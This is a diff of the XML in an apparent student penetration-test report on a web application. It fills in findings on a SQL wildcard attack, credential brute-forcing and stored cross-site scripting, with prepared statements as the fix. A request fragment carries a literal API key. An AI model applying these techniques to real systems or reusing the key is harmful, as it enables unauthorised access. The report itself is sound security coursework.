+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>headers</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>: {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="200" w:firstLine="360"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>apikey</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"ad266779-af2a-11eb-9a2c-0242ac110002"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>}).</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>done</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>((</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-def"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-operator"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable-2"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>});</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -9644,7 +10194,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71393751"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71399654"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9686,7 +10236,19 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>: An attacker could do xyz with this vulnerability</w:t>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>An attacker c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>an list out all the trainings in the store.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9716,7 +10278,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71393752"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71399655"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9748,14 +10310,26 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Possible: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">Possible: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Search-related functionalities are common places for SQL wildcard attacks while exploiting this vulnerability requires the attacker to login first</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so the overall likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9785,7 +10359,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71393753"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71399656"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9833,7 +10407,33 @@
               <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve">, possible likelihood and </w:t>
+            </w:r>
+            <w:r>
+              <w:t>negligible</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> impact suggest a </w:t>
+            </w:r>
+            <w:r>
+              <w:t>low</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> risk</w:t>
+            </w:r>
+            <w:r>
+              <w:t>. Since an attacker can only leak out information from the current table which contains no sensitive information, it is said to be low-risk.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9863,7 +10463,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71393754"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71399657"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9895,14 +10495,14 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[1] Lecture 5 SQL wildcard attack slides</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9932,7 +10532,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71393755"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71399658"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9962,28 +10562,172 @@
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>The fix goes here</w:t>
-            </w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>U</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>se prepared statements. For example:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;execute();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;close();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p/>
-    <w:p/>
     <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71393756"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71399659"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -10053,7 +10797,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71393757"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71399660"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -10075,7 +10819,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc71393758"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71399661"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -10823,7 +11567,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>3</w:t>
             </w:r>
           </w:p>
@@ -12109,7 +12852,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc71393759"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71399662"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -12136,7 +12879,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
-      <w:bookmarkStart w:id="53" w:name="_Toc71393760"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71399663"/>
       <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
@@ -13316,7 +14059,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc71393761"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71399664"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr>
@@ -13829,7 +14572,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
-      <w:bookmarkStart w:id="57" w:name="_Toc71393762"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71399665"/>
       <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:rPr>
@@ -16612,6 +17355,41 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="00EF0E63"/>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="message-body">
+    <w:name w:val="message-body"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable">
+    <w:name w:val="cm-variable"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-property">
+    <w:name w:val="cm-property"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
+    <w:name w:val="cm-string"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-def">
+    <w:name w:val="cm-def"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
+    <w:name w:val="cm-operator"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable-2">
+    <w:name w:val="cm-variable-2"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -72,21 +72,23 @@
           <w:szCs w:val="48"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>PleaseHold Pty. Ltd.</w:t>
-      </w:r>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -94,18 +96,16 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t xml:space="preserve">- WEB APPLICATION </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="right"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">- WEB APPLICATION </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -216,21 +216,23 @@
           <w:szCs w:val="48"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="right"/>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t xml:space="preserve">Report delivered: </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>06</w:t>
+        <w:t xml:space="preserve">Report delivered: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -238,7 +240,7 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>/</w:t>
+        <w:t>06</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -246,7 +248,7 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>05</w:t>
+        <w:t>/</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -254,6 +256,14 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
+        <w:t>05</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
         <w:t>/2021</w:t>
       </w:r>
     </w:p>
@@ -261,7 +271,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc71399616"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71451188"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -281,7 +291,15 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> at the request of PleaseHold Pty. Ltd.</w:t>
+        <w:t xml:space="preserve"> at the request of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -514,7 +532,43 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>allows a user to brute-force all other users’ login credentials, resulting in the ability to perform unauthorised actions and leak personally identifiable information.</w:t>
+        <w:t xml:space="preserve">allows a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">malicious </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>user to brute-force</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> out</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> all </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>other users’ login credentials, resulting in the ability to perform unauthorised actions and leak personally identifiable information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -540,7 +594,31 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. </w:t>
+        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>malicious</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> code to the database, which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>could</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> perform unauthorised actions when triggered. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -704,7 +782,21 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Since PleaseHold deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
+        <w:t xml:space="preserve"> Since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -841,7 +933,19 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
